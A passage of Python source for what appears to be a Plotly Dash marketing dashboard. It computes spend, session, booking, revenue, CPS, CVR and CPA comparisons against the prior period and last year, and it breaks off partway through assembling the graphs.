df_by_date_combined['Bookings_YoY_percent_conditional'] = df_by_date_combined['Bookings YoY (%)'] = np.where((df_by_date_combined['Bookings - TY'] != 0) & (df_by_date_combined['Bookings - LY'] != 0),\
(df_by_date_combined['Bookings - TY'] - df_by_date_combined['Bookings - LY'])/df_by_date_combined['Bookings - LY'] * 100, df_by_date_combined['Bookings YoY (%)'])
# Formatter
df_by_date_combined['Bookings YoY (%)'] = np.where((df_by_date_combined['Bookings - TY'] != 0) & (df_by_date_combined['Bookings - LY'] != 0),\
df_by_date_combined['Bookings YoY (%)'].apply(formatter_percent), df_by_date_combined['Bookings YoY (%)'])
df_by_date_combined['Revenue_PoP_abs_conditional'] = df_by_date_combined['Revenue PoP (Abs)'] = (df_by_date_combined['Revenue - TY'] - df_by_date_combined['Revenue - LP'])
# Formatter
df_by_date_combined['Revenue PoP (Abs)'] = df_by_date_combined['Revenue PoP (Abs)'].apply(formatter_currency)
df_by_date_combined['Revenue_YoY_abs_conditional'] = df_by_date_combined['Revenue YoY (Abs)'] = (df_by_date_combined['Revenue - TY'] - df_by_date_combined['Revenue - LY'])
# Formatter
df_by_date_combined['Revenue YoY (Abs)'] = df_by_date_combined['Revenue YoY (Abs)'].apply(formatter_currency)
df_by_date_combined['Revenue_PoP_percent_conditional'] = df_by_date_combined['Revenue PoP (%)'] = np.where((df_by_date_combined['Revenue - LP'] != 0) & (df_by_date_combined['Revenue - LP'] != 0),\
(df_by_date_combined['Revenue - TY'] - df_by_date_combined['Revenue - LP'])/df_by_date_combined['Revenue - LP'] * 100, df_by_date_combined['Revenue PoP (%)'])
# Formatter
df_by_date_combined['Revenue PoP (%)'] = np.where((df_by_date_combined['Revenue - LP'] != 0) & (df_by_date_combined['Revenue - LP'] != 0),\
df_by_date_combined['Revenue PoP (%)'].apply(formatter_percent), df_by_date_combined['Revenue PoP (%)'])
df_by_date_combined['Revenue_YoY_percent_conditional'] = df_by_date_combined['Revenue YoY (%)'] = np.where((df_by_date_combined['Revenue - TY'] != 0) & (df_by_date_combined['Revenue - LY'] != 0),\
(df_by_date_combined['Revenue - TY'] - df_by_date_combined['Revenue - LY'])/df_by_date_combined['Revenue - LY'] * 100, df_by_date_combined['Revenue YoY (%)'])
# Formatter
df_by_date_combined['Revenue YoY (%)'] = np.where((df_by_date_combined['Revenue - TY'] != 0) & (df_by_date_combined['Revenue - LY'] != 0),\
df_by_date_combined['Revenue YoY (%)'].apply(formatter_percent), df_by_date_combined['Revenue YoY (%)'])
# Format Numbers
df_by_date_combined['Spend TY'] = df_by_date_combined['Spend TY'].apply(formatter_currency)
df_by_date_combined['Spend - LP'] = df_by_date_combined['Spend - LP'].apply(formatter_currency)
df_by_date_combined['Spend LY'] = df_by_date_combined['Spend LY'].apply(formatter_currency)
df_by_date_combined['Sessions - TY'] = df_by_date_combined['Sessions - TY'].apply(formatter_number)
df_by_date_combined['Sessions - LP'] = df_by_date_combined['Sessions - LP'].apply(formatter_number)
df_by_date_combined['Sessions - LY'] = df_by_date_combined['Sessions - LY'].apply(formatter_number)
df_by_date_combined['Bookings - TY'] = df_by_date_combined['Bookings - TY'].apply(formatter_number)
df_by_date_combined['Bookings - LP'] = df_by_date_combined['Bookings - LP'].apply(formatter_number)
df_by_date_combined['Bookings - LY'] = df_by_date_combined['Bookings - LY'].apply(formatter_number)
df_by_date_combined['Revenue - TY'] = df_by_date_combined['Revenue - TY'].apply(formatter_currency)
df_by_date_combined['Revenue - LP'] = df_by_date_combined['Revenue - LP'].apply(formatter_currency)
df_by_date_combined['Revenue - LY'] = df_by_date_combined['Revenue - LY'].apply(formatter_currency)
# Rearrange the columns
df_by_date_combined_dt = df_by_date_combined[[
'Placement type',
'Spend TY', 'Spend - LP', 'Spend PoP (Abs)', 'Spend PoP (%)', 'Spend LY', 'Spend YoY (%)',
'Sessions - TY', 'Sessions - LP', 'Sessions PoP (%)', 'Sessions - LY', 'Sessions YoY (%)',
'Bookings - TY', 'Bookings - LP', 'Bookings PoP (%)', 'Bookings PoP (Abs)', 'Bookings - LY', 'Bookings YoY (%)', 'Bookings YoY (Abs)',
'Revenue - TY', 'Revenue - LP', 'Revenue PoP (Abs)', 'Revenue PoP (%)', 'Revenue - LY', 'Revenue YoY (%)', 'Revenue YoY (Abs)',
# 'Spend_PoP_percent_conditional',
]]
data_df = df_by_date_combined.to_dict("rows")
return data_df
# First Data Table Download Function
def update_first_download(start_date, end_date, category, aggregation):
    """Assemble the first data table in raw (unformatted) form for download.

    Aggregates the module-level ``df`` over the selected window and two
    comparison windows — the immediately preceding period of equal length
    (LP) and the same window one year earlier (LY) — then derives PoP/YoY
    deltas plus the CPS, CVR and CPA efficiency metrics.  Values are left
    numeric (no currency/percent string formatting) so the frame is
    suitable for CSV export.

    Parameters
    ----------
    start_date, end_date : str or None
        Selected range as ``'YYYY-MM-DD'`` strings.
    category : str
        Category filter; applied only when ``aggregation`` is
        ``'Placement type'``.
    aggregation : str
        ``'Placement type'``, ``'GA Category'`` or ``'Birst Category'``.

    Returns
    -------
    pandas.DataFrame
        One row per aggregation value, with date-window metadata columns
        and all derived metrics in download order.
    """
    if start_date is not None:
        start_date = dt.strptime(start_date, '%Y-%m-%d')
        start_date_string = start_date.strftime('%Y-%m-%d')
    if end_date is not None:
        end_date = dt.strptime(end_date, '%Y-%m-%d')
        end_date_string = end_date.strftime('%Y-%m-%d')
    # Prior period (LP): the window of identical length immediately before
    # the selected one.
    days_selected = (end_date - start_date).days
    prior_start_date = start_date - timedelta(days_selected + 1)
    prior_start_date_string = datetime.strftime(prior_start_date, '%Y-%m-%d')
    prior_end_date = end_date - timedelta(days_selected + 1)
    prior_end_date_string = datetime.strftime(prior_end_date, '%Y-%m-%d')
    # --- Aggregate the selected and prior windows ----------------------
    if aggregation == 'Placement type':
        # Only the placement view is restricted to the selected category.
        df1 = df[(df['Category'] == category)].groupby(['Date', aggregation]).sum()[columns].reset_index()
    else:
        df1 = df.groupby(['Date', aggregation]).sum()[columns].reset_index()
    df_by_date = df1[(df1['Date'] >= start_date_string) & (df1['Date'] <= end_date_string)].groupby([aggregation]).sum()[columns].reset_index()
    df_by_date_prior = df1[(df1['Date'] >= prior_start_date_string) & (df1['Date'] <= prior_end_date_string)].groupby([aggregation]).sum()[['Spend TY', 'Sessions - TY', 'Bookings - TY', 'Revenue - TY']].reset_index()
    df_by_date_prior.rename(columns={'Spend TY': 'Spend - LP', 'Sessions - TY': 'Sessions - LP',
                                     'Bookings - TY': 'Bookings - LP', 'Revenue - TY': 'Revenue - LP'},
                            inplace=True)
    combined = pd.merge(df_by_date, df_by_date_prior, on=[aggregation])
    if aggregation in ('GA Category', 'Birst Category'):
        # Downstream column names are keyed on 'Placement type' in every view.
        combined.rename(columns={aggregation: 'Placement type'}, inplace=True)

    def _pct(ty, base, scale=100):
        # Relative change of `ty` vs `base` (scaled to percent by default);
        # NaN unless both sides are nonzero, matching the blank-on-no-data
        # convention used throughout this dashboard.
        return np.where((combined[ty] != 0) & (combined[base] != 0),
                        (combined[ty] - combined[base]) / combined[base] * scale,
                        np.nan)

    def _ratio(num, den, scale=1):
        # num/den (optionally scaled to a percentage); NaN unless both nonzero.
        return np.where((combined[num] != 0) & (combined[den] != 0),
                        combined[num] / combined[den] * scale,
                        np.nan)

    # --- Spend / Sessions / Bookings / Revenue deltas ------------------
    combined['Spend PoP (Abs)'] = combined['Spend TY'] - combined['Spend - LP']
    combined['Spend PoP (%)'] = _pct('Spend TY', 'Spend - LP')
    combined['Spend YoY (%)'] = _pct('Spend TY', 'Spend LY')
    combined['Sessions PoP (%)'] = _pct('Sessions - TY', 'Sessions - LP')
    combined['Sessions YoY (%)'] = _pct('Sessions - TY', 'Sessions - LY')
    combined['Bookings PoP (Abs)'] = combined['Bookings - TY'] - combined['Bookings - LP']
    combined['Bookings YoY (Abs)'] = combined['Bookings - TY'] - combined['Bookings - LY']
    combined['Bookings PoP (%)'] = _pct('Bookings - TY', 'Bookings - LP')
    combined['Bookings YoY (%)'] = _pct('Bookings - TY', 'Bookings - LY')
    combined['Revenue PoP (Abs)'] = combined['Revenue - TY'] - combined['Revenue - LP']
    combined['Revenue YoY (Abs)'] = combined['Revenue - TY'] - combined['Revenue - LY']
    # BUG FIX: the original guarded Revenue PoP (%) on 'Revenue - LP' twice
    # and never checked 'Revenue - TY'.
    combined['Revenue PoP (%)'] = _pct('Revenue - TY', 'Revenue - LP')
    combined['Revenue YoY (%)'] = _pct('Revenue - TY', 'Revenue - LY')
    # --- Efficiency metrics: CPS (cost/session), CVR (%), CPA (cost/booking)
    # NOTE(review): the CPS/CVR/CPA percent deltas below are plain ratios
    # (no *100), exactly as in the original — confirm downstream formatting
    # expects ratios here.
    combined['CPS - TY'] = _ratio('Spend TY', 'Sessions - TY')
    combined['CPS - LP'] = _ratio('Spend - LP', 'Sessions - LP')
    combined['CPS PoP (Abs)'] = combined['CPS - TY'] - combined['CPS - LP']
    combined['CPS PoP (%)'] = _pct('CPS - TY', 'CPS - LP', scale=1)
    combined['CPS - LY'] = _ratio('Spend LY', 'Sessions - LY')
    combined['CPS YoY (Abs)'] = combined['CPS - TY'] - combined['CPS - LY']
    combined['CPS YoY (%)'] = _pct('CPS - TY', 'CPS - LY', scale=1)
    combined['CVR - TY'] = _ratio('Bookings - TY', 'Sessions - TY', scale=100)
    combined['CVR - LP'] = _ratio('Bookings - LP', 'Sessions - LP', scale=100)
    combined['CVR PoP (Abs)'] = np.where(combined['CVR - TY'].notnull() & combined['CVR - LP'].notnull(),
                                         combined['CVR - TY'] - combined['CVR - LP'], np.nan)
    combined['CVR PoP (%)'] = _pct('CVR - TY', 'CVR - LP', scale=1)
    combined['CVR - LY'] = _ratio('Bookings - LY', 'Sessions - LY', scale=100)
    combined['CVR YoY (Abs)'] = np.where(combined['CVR - TY'].notnull() & combined['CVR - LY'].notnull(),
                                         combined['CVR - TY'] - combined['CVR - LY'], np.nan)
    combined['CVR YoY (%)'] = _pct('CVR - TY', 'CVR - LY', scale=1)
    combined['CPA - TY'] = _ratio('Spend TY', 'Bookings - TY')
    combined['CPA - LP'] = _ratio('Spend - LP', 'Bookings - LP')
    combined['CPA PoP (Abs)'] = np.where((combined['CPA - TY'] != 0) & (combined['CPA - LP'] != 0),
                                         combined['CPA - TY'] - combined['CPA - LP'], np.nan)
    combined['CPA PoP (%)'] = _pct('CPA - TY', 'CPA - LP', scale=1)
    combined['CPA - LY'] = _ratio('Spend LY', 'Bookings - LY')
    combined['CPA YoY (Abs)'] = np.where((combined['CPA - TY'] != 0) & (combined['CPA - LY'] != 0),
                                         combined['CPA - TY'] - combined['CPA - LY'], np.nan)
    combined['CPA YoY (%)'] = _pct('CPA - TY', 'CPA - LY', scale=1)
    # --- Date-window metadata for the export ---------------------------
    combined['TY Start Date'] = start_date_string
    combined['TY End Date'] = end_date_string
    combined['LP Start Date'] = prior_start_date_string
    combined['LP End Date'] = prior_end_date_string
    # LY window is 364 days (52 whole weeks) back so weekdays line up.
    last_years_start_date = start_date - timedelta(364)
    last_years_start_date_string = datetime.strftime(last_years_start_date, '%Y-%m-%d')
    last_years_end_date = end_date - timedelta(364)
    last_years_end_date_string = datetime.strftime(last_years_end_date, '%Y-%m-%d')
    combined['LY Start Date'] = last_years_start_date_string
    combined['LY End Date'] = last_years_end_date_string
    # --- Final column order for the download ---------------------------
    download_df_1 = combined[[
        'Placement type', 'TY Start Date', 'TY End Date', 'LP Start Date', 'LP End Date', 'LY Start Date', 'LY End Date',
        'Spend TY', 'Spend - LP', 'Spend PoP (Abs)', 'Spend PoP (%)', 'Spend LY', 'Spend YoY (%)',
        'Sessions - TY', 'Sessions - LP', 'Sessions PoP (%)', 'Sessions - LY', 'Sessions YoY (%)',
        'Bookings - TY', 'Bookings - LP', 'Bookings PoP (%)', 'Bookings PoP (Abs)', 'Bookings - LY', 'Bookings YoY (%)', 'Bookings YoY (Abs)',
        'Revenue - TY', 'Revenue - LP', 'Revenue PoP (Abs)', 'Revenue PoP (%)', 'Revenue - LY', 'Revenue YoY (%)', 'Revenue YoY (Abs)',
        'CPS - TY', 'CPS - LP', 'CPS PoP (Abs)', 'CPS PoP (%)',
        'CPS - LY', 'CPS YoY (Abs)', 'CPS YoY (%)',
        'CVR - TY', 'CVR - LP', 'CVR PoP (Abs)', 'CVR PoP (%)',
        'CVR - LY', 'CVR YoY (Abs)', 'CVR YoY (%)',
        'CPA - TY', 'CPA - LP', 'CPA PoP (Abs)', 'CPA PoP (%)',
        'CPA - LY', 'CPA YoY (Abs)', 'CPA YoY (%)',
    ]]
    return download_df_1
# Second Data Table Update Function
def update_second_datatable(start_date, end_date, category, aggregation):
    """Build the second (efficiency) data table: CPS, CVR and CPA.

    Aggregates the module-level ``df`` over the selected window and the
    immediately preceding window of equal length (LP), computes CPS
    (cost per session), CVR (conversion rate, %) and CPA (cost per
    acquisition) for TY/LP/LY plus their PoP/YoY deltas, then formats the
    display columns as currency/percent strings.  Each delta also gets a
    raw numeric ``*_conditional`` twin, taken before formatting, for
    sign-based conditional cell styling.

    Parameters
    ----------
    start_date, end_date : str or None
        Selected range as ``'YYYY-MM-DD'`` strings.
    category : str
        Category filter; applied only when ``aggregation`` is
        ``'Placement type'``.
    aggregation : str
        ``'Placement type'``, ``'GA Category'`` or ``'Birst Category'``.

    Returns
    -------
    list of dict
        Table rows via ``DataFrame.to_dict("rows")``.
    """
    if start_date is not None:
        start_date = dt.strptime(start_date, '%Y-%m-%d')
        start_date_string = start_date.strftime('%Y-%m-%d')
    if end_date is not None:
        end_date = dt.strptime(end_date, '%Y-%m-%d')
        end_date_string = end_date.strftime('%Y-%m-%d')
    # Prior period (LP): the window of identical length immediately before
    # the selected one.
    days_selected = (end_date - start_date).days
    prior_start_date = start_date - timedelta(days_selected + 1)
    prior_start_date_string = datetime.strftime(prior_start_date, '%Y-%m-%d')
    prior_end_date = end_date - timedelta(days_selected + 1)
    prior_end_date_string = datetime.strftime(prior_end_date, '%Y-%m-%d')
    # --- Aggregate the selected and prior windows ----------------------
    if aggregation == 'Placement type':
        # Only the placement view is restricted to the selected category.
        df1 = df[(df['Category'] == category)].groupby(['Date', aggregation]).sum()[columns].reset_index()
    else:
        df1 = df.groupby(['Date', aggregation]).sum()[columns].reset_index()
    df_by_date = df1[(df1['Date'] >= start_date_string) & (df1['Date'] <= end_date_string)].groupby([aggregation]).sum()[columns].reset_index()
    df_by_date_prior = df1[(df1['Date'] >= prior_start_date_string) & (df1['Date'] <= prior_end_date_string)].groupby([aggregation]).sum()[['Spend TY', 'Sessions - TY', 'Bookings - TY', 'Revenue - TY']].reset_index()
    df_by_date_prior.rename(columns={'Spend TY': 'Spend - LP', 'Sessions - TY': 'Sessions - LP',
                                     'Bookings - TY': 'Bookings - LP', 'Revenue - TY': 'Revenue - LP'},
                            inplace=True)
    combined = pd.merge(df_by_date, df_by_date_prior, on=[aggregation])
    if aggregation in ('GA Category', 'Birst Category'):
        # Downstream column names are keyed on 'Placement type' in every view.
        combined.rename(columns={aggregation: 'Placement type'}, inplace=True)
    # (The original also computed formatted Spend/Sessions/Bookings/Revenue
    # delta strings here; those columns were dropped by the final selection
    # below, so the dead code has been removed.)

    def _ratio(num, den, scale=1):
        # num/den (optionally scaled to a percentage); NaN unless both nonzero.
        return np.where((combined[num] != 0) & (combined[den] != 0),
                        combined[num] / combined[den] * scale,
                        np.nan)

    # --- CPS / CVR / CPA and their deltas ------------------------------
    # Deltas are plain arithmetic: whenever a TY/LP/LY value is NaN the
    # difference/ratio propagates NaN, which matches the original guards.
    combined['CPS - TY'] = _ratio('Spend TY', 'Sessions - TY')
    combined['CPS - LP'] = _ratio('Spend - LP', 'Sessions - LP')
    combined['CPS - LY'] = _ratio('Spend LY', 'Sessions - LY')
    combined['CPS PoP (Abs)'] = combined['CPS - TY'] - combined['CPS - LP']
    combined['CPS PoP (%)'] = (combined['CPS - TY'] - combined['CPS - LP']) / combined['CPS - LP'] * 100
    combined['CPS YoY (Abs)'] = combined['CPS - TY'] - combined['CPS - LY']
    combined['CPS YoY (%)'] = (combined['CPS - TY'] - combined['CPS - LY']) / combined['CPS - LY'] * 100
    combined['CVR - TY'] = _ratio('Bookings - TY', 'Sessions - TY', scale=100)
    combined['CVR - LP'] = _ratio('Bookings - LP', 'Sessions - LP', scale=100)
    combined['CVR - LY'] = _ratio('Bookings - LY', 'Sessions - LY', scale=100)
    combined['CVR PoP (Abs)'] = combined['CVR - TY'] - combined['CVR - LP']
    combined['CVR PoP (%)'] = (combined['CVR - TY'] - combined['CVR - LP']) / combined['CVR - LP'] * 100
    combined['CVR YoY (Abs)'] = combined['CVR - TY'] - combined['CVR - LY']
    combined['CVR YoY (%)'] = (combined['CVR - TY'] - combined['CVR - LY']) / combined['CVR - LY'] * 100
    combined['CPA - TY'] = _ratio('Spend TY', 'Bookings - TY')
    combined['CPA - LP'] = _ratio('Spend - LP', 'Bookings - LP')
    combined['CPA - LY'] = _ratio('Spend LY', 'Bookings - LY')
    combined['CPA PoP (Abs)'] = combined['CPA - TY'] - combined['CPA - LP']
    combined['CPA PoP (%)'] = (combined['CPA - TY'] - combined['CPA - LP']) / combined['CPA - LP'] * 100
    combined['CPA YoY (Abs)'] = combined['CPA - TY'] - combined['CPA - LY']
    combined['CPA YoY (%)'] = (combined['CPA - TY'] - combined['CPA - LY']) / combined['CPA - LY'] * 100
    # Raw numeric twins for conditional (sign-based) styling, captured
    # BEFORE the string formatting below.
    # BUG FIX: the original assigned 'CPS_PoP_percent_conditional' twice —
    # the second assignment clobbered the PoP copy with the YoY delta and
    # 'CPS_YoY_percent_conditional' was never created (the final column
    # list then selected the PoP name twice).
    combined['CPS_PoP_abs_conditional'] = combined['CPS PoP (Abs)']
    combined['CPS_PoP_percent_conditional'] = combined['CPS PoP (%)']
    combined['CPS_YoY_abs_conditional'] = combined['CPS YoY (Abs)']
    combined['CPS_YoY_percent_conditional'] = combined['CPS YoY (%)']
    combined['CVR_PoP_abs_conditional'] = combined['CVR PoP (Abs)']
    combined['CVR_PoP_percent_conditional'] = combined['CVR PoP (%)']
    combined['CVR_YoY_abs_conditional'] = combined['CVR YoY (Abs)']
    combined['CVR_YoY_percent_conditional'] = combined['CVR YoY (%)']
    combined['CPA_PoP_abs_conditional'] = combined['CPA PoP (Abs)']
    combined['CPA_PoP_percent_conditional'] = combined['CPA PoP (%)']
    combined['CPA_YoY_abs_conditional'] = combined['CPA YoY (Abs)']
    combined['CPA_YoY_percent_conditional'] = combined['CPA YoY (%)']
    #### REMEMBER FORMATTING MUST BE DONE AFTER MAKING CALCULATIONS

    def _fmt(col, formatter):
        # Format only non-null cells; NaN cells stay NaN so they render blank.
        combined[col] = np.where(combined[col].notnull(),
                                 combined[col].apply(formatter), combined[col])

    for col in ('CPS - TY', 'CPS - LP', 'CPS - LY', 'CPS PoP (Abs)', 'CPS YoY (Abs)',
                'CPA - TY', 'CPA - LP', 'CPA - LY', 'CPA PoP (Abs)', 'CPA YoY (Abs)'):
        _fmt(col, formatter_currency_with_cents)
    for col in ('CPA PoP (%)', 'CPA YoY (%)', 'CPS PoP (%)', 'CPS YoY (%)',
                'CVR PoP (%)', 'CVR YoY (%)'):
        _fmt(col, formatter_percent)
    for col in ('CVR - TY', 'CVR - LP', 'CVR - LY', 'CVR PoP (Abs)', 'CVR YoY (Abs)'):
        _fmt(col, formatter_percent_2_digits)
    # --- Final column order for the Dash table -------------------------
    combined = combined[[
        'Placement type',
        'CPS - TY', 'CPS - LP', 'CPS PoP (Abs)', 'CPS PoP (%)',
        'CPS - LY', 'CPS YoY (Abs)', 'CPS YoY (%)',
        'CVR - TY', 'CVR - LP', 'CVR PoP (Abs)', 'CVR PoP (%)',
        'CVR - LY', 'CVR YoY (Abs)', 'CVR YoY (%)',
        'CPA - TY', 'CPA - LP', 'CPA PoP (Abs)', 'CPA PoP (%)',
        'CPA - LY', 'CPA YoY (Abs)', 'CPA YoY (%)',
        'CPS_PoP_abs_conditional', 'CPS_PoP_percent_conditional', 'CPS_YoY_abs_conditional', 'CPS_YoY_percent_conditional',
        'CVR_PoP_abs_conditional', 'CVR_PoP_percent_conditional', 'CVR_YoY_abs_conditional', 'CVR_YoY_percent_conditional',
        'CPA_PoP_abs_conditional', 'CPA_PoP_percent_conditional', 'CPA_YoY_abs_conditional', 'CPA_YoY_percent_conditional',
    ]]
    # "rows" orient kept for consistency with the rest of the file;
    # NOTE(review): modern pandas spells this orient "records".
    data_df = combined.to_dict("rows")
    return data_df
######################## FOR GRAPHS ########################
def update_graph(filtered_df, end_date):
    """Build a six-row Plotly subplot figure from the weekly dataframe.

    Rows: Sessions, Spend, Bookings, Cost per Acquisition, CPS and
    Conversion Rate.  Each subplot shows a this-year (TY) line, a
    last-year (LY) line and a YoY bar plotted on a secondary right-hand
    axis.

    :param filtered_df: pandas DataFrame with 'Year', 'Week', 'Spend TY/LY',
        'Sessions - TY/LY', 'Bookings - TY/LY' and 'Revenue - TY/LY'
        columns.  Mutated in place: derived YoY / CPS / CVR / CPA columns
        are added.
    :param end_date: 'YYYY-MM-DD' string (or None) deciding which calendar
        year counts as "current".
    :return: the assembled Plotly figure.
    """
    if end_date is not None:
        end_date = dt.strptime(end_date, '%Y-%m-%d')
        end_date_string = end_date.strftime('%Y-%m-%d')
        # Dates up to 2018-12-29 belong to the 2018 reporting year.
        # NOTE(review): current_year is only bound inside this branch; a
        # None end_date would raise NameError below - confirm callers
        # always supply a date.
        if end_date_string <= '2018-12-29':
            current_year = 2018
        else:
            current_year = 2019
    # Calculate YoY differences (percent change versus last year).
    filtered_df['Spend YoY (%)'] = ((filtered_df['Spend TY'] - filtered_df['Spend LY'])/filtered_df['Spend LY']) * 100
    filtered_df['Sessions YoY (%)'] = ((filtered_df['Sessions - TY'] - filtered_df['Sessions - LY'])/filtered_df['Sessions - LY']) * 100
    filtered_df['Bookings - % - PY'] = ((filtered_df['Bookings - TY'] - filtered_df['Bookings - LY'])/filtered_df['Bookings - LY']) * 100
    filtered_df['Revenue - % - PY'] = ((filtered_df['Revenue - TY'] - filtered_df['Revenue - LY'])/filtered_df['Revenue - LY']) * 100
    # Calculate CPS, CVR, CPA.  Columns start as NaN so rows with a zero
    # denominator stay NaN (gaps in the graphs rather than inf values).
    filtered_df['CPS - TY'] = np.nan
    filtered_df['CPS - LY'] = np.nan
    filtered_df['% YoY_CPS'] = np.nan
    filtered_df['CVR - TY'] = np.nan
    filtered_df['CVR - LY'] = np.nan
    filtered_df['CVR YoY (Abs)'] = np.nan
    filtered_df['CPA - TY'] = np.nan
    filtered_df['CPA - LY'] = np.nan
    filtered_df['% YoY_CPA'] = np.nan
    # Cost per session = spend / sessions, only where both are non-zero.
    filtered_df['CPS - TY'] = np.where((filtered_df['Spend TY'] != 0) & (filtered_df['Sessions - TY'] != 0), (filtered_df['Spend TY']/filtered_df['Sessions - TY']), filtered_df['CPS - TY'])
    filtered_df['CPS - LY'] = np.where((filtered_df['Spend LY'] != 0) & (filtered_df['Sessions - LY'] != 0), (filtered_df['Spend LY']/filtered_df['Sessions - LY']), filtered_df['CPS - LY'])
    # NOTE(review): unlike '% YoY_CPA' below, this ratio is NOT multiplied
    # by 100 - confirm whether that is intentional.
    filtered_df['% YoY_CPS'] = np.where((filtered_df['CPS - TY'] != 0) & (filtered_df['CPS - LY'] != 0), ((filtered_df['CPS - TY'] - filtered_df['CPS - LY'])/filtered_df['CPS - LY']), filtered_df['% YoY_CPS'])
    # Conversion rate = bookings / sessions, expressed as a percentage.
    filtered_df['CVR - TY'] = np.where(((filtered_df['Bookings - TY'] != 0) & (filtered_df['Sessions - TY'] != 0)), (filtered_df['Bookings - TY']/filtered_df['Sessions - TY'] * 100), filtered_df['CVR - TY'])
    filtered_df['CVR - LY'] = np.where(((filtered_df['Bookings - LY'] != 0) & (filtered_df['Sessions - LY'] != 0)), (filtered_df['Bookings - LY']/filtered_df['Sessions - LY'] * 100), filtered_df['CVR - LY'])
    filtered_df['CVR YoY (Abs)'] = np.where((filtered_df['CVR - TY'].notnull() & filtered_df['CVR - LY'].notnull()), ((filtered_df['CVR - TY'] - filtered_df['CVR - LY'])), filtered_df['CVR YoY (Abs)'])
    # Cost per acquisition = spend / bookings.
    filtered_df['CPA - TY'] = np.where((filtered_df['Spend TY'] != 0) & (filtered_df['Bookings - TY'] != 0), (filtered_df['Spend TY']/filtered_df['Bookings - TY']), filtered_df['CPA - TY'])
    filtered_df['CPA - LY'] = np.where((filtered_df['Spend LY'] != 0) & (filtered_df['Bookings - LY'] != 0), (filtered_df['Spend LY']/filtered_df['Bookings - LY']), filtered_df['CPA - LY'])
    filtered_df['% YoY_CPA'] = np.where((filtered_df['CPA - TY'] != 0) & (filtered_df['CPA - LY'] != 0), ((filtered_df['CPA - TY'] - filtered_df['CPA - LY'])/filtered_df['CPA - LY']) * 100, filtered_df['% YoY_CPA'])
    # Sessions graphs.  The LY trace reads the same 'Sessions - TY' column
    # but filters on Year == current_year-1: each row presumably holds the
    # value for its own calendar year.
    sessions_ty = go.Scatter(
        x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
        y=filtered_df[(filtered_df['Year'] == current_year)]['Sessions - TY'],
        text='Sessions - TY'
    )
    sessions_ly = go.Scatter(
        x=filtered_df[(filtered_df['Year'] == current_year-1)]['Week'],
        y=filtered_df[(filtered_df['Year'] == current_year-1)]['Sessions - TY'],
        text='Sessions - LY'
    )
    sessions_yoy = go.Bar(
        x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
        y=filtered_df[(filtered_df['Year'] == current_year)]['Sessions YoY (%)'],
        text='Sessions YoY (%)', opacity=0.6
    )
    # Spend graphs.
    spend_ty = go.Scatter(
        x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
        y=filtered_df[(filtered_df['Year'] == current_year)]['Spend TY'],
        text='Spend TY'
    )
    spend_ly = go.Scatter(
        x=filtered_df[(filtered_df['Year'] == current_year-1)]['Week'],
        y=filtered_df[(filtered_df['Year'] == current_year-1)]['Spend TY'],
        text='Spend LY'
    )
    spend_yoy = go.Bar(
        x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
        y=filtered_df[(filtered_df['Year'] == current_year)]['Spend YoY (%)'],
        text='Spend YoY (%)', opacity=0.6
    )
    # Bookings graphs.
    bookings_ty = go.Scatter(
        x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
        y=filtered_df[(filtered_df['Year'] == current_year)]['Bookings - TY'],
        text='Bookings - TY'
    )
    bookings_ly = go.Scatter(
        x=filtered_df[(filtered_df['Year'] == current_year-1)]['Week'],
        y=filtered_df[(filtered_df['Year'] == current_year-1)]['Bookings - TY'],
        text='Bookings - LY'
    )
    bookings_yoy = go.Bar(
        x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
        y=filtered_df[(filtered_df['Year'] == current_year)]['Bookings - % - PY'],
        text='Bookings - % - PY', opacity=0.6
    )
    # Cost-per-acquisition graphs.
    cpa_ty = go.Scatter(
        x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
        y=filtered_df[(filtered_df['Year'] == current_year)]['CPA - TY'],
        text='CPA - TY'
    )
    cpa_ly = go.Scatter(
        x=filtered_df[(filtered_df['Year'] == current_year-1)]['Week'],
        y=filtered_df[(filtered_df['Year'] == current_year-1)]['CPA - TY'],
        text='CPA - LY'
    )
    cpa_yoy = go.Bar(
        x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
        y=filtered_df[(filtered_df['Year'] == current_year)]['% YoY_CPA'],
        text='% CPA - YoY', opacity=0.6
    )
    # Cost-per-session graphs.
    cps_ty = go.Scatter(
        x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
        y=filtered_df[(filtered_df['Year'] == current_year)]['CPS - TY'],
        text='CPS - TY'
    )
    cps_ly = go.Scatter(
        x=filtered_df[(filtered_df['Year'] == current_year-1)]['Week'],
        y=filtered_df[(filtered_df['Year'] == current_year-1)]['CPS - TY'],
        text='CPS - LY'
    )
    cps_yoy = go.Bar(
        x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
        y=filtered_df[(filtered_df['Year'] == current_year)]['% YoY_CPS'],
        text='% CPS - YoY', opacity=0.6
    )
    # Conversion-rate graphs.
    cr_ty = go.Scatter(
        x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
        y=filtered_df[(filtered_df['Year'] == current_year)]['CVR - TY'],
        text='CVR - TY'
    )
    cr_ly = go.Scatter(
        x=filtered_df[(filtered_df['Year'] == current_year-1)]['Week'],
        y=filtered_df[(filtered_df['Year'] == current_year-1)]['CVR - TY'],
        text='CVR - LY'
    )
    cr_yoy = go.Bar(
        x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
        y=filtered_df[(filtered_df['Year'] == current_year)]['CVR YoY (Abs)'],
        text='CVR YoY (Abs)', opacity=0.6
    )
    fig = tools.make_subplots(
        rows=6,
        cols=1,
        shared_xaxes=True,
        subplot_titles=(  # Be sure to have same number of titles as number of graphs
            'Sessions',
            'Spend',
            'Bookings',
            'Cost per Acquisition',
            'CPS',
            'Conversion Rate'
        ))
    # Trace indices (comments) are used below to reroute the YoY bars.
    fig.append_trace(sessions_ty, 1, 1)  # 0
    fig.append_trace(sessions_ly, 1, 1)  # 1
    fig.append_trace(sessions_yoy, 1, 1)  # 2
    fig.append_trace(spend_ty, 2, 1)  # 3
    fig.append_trace(spend_ly, 2, 1)  # 4
    fig.append_trace(spend_yoy, 2, 1)  # 5
    fig.append_trace(bookings_ty, 3, 1)  # 6
    fig.append_trace(bookings_ly, 3, 1)  # 7
    fig.append_trace(bookings_yoy, 3, 1)  # 8
    fig.append_trace(cpa_ty, 4, 1)  # 9
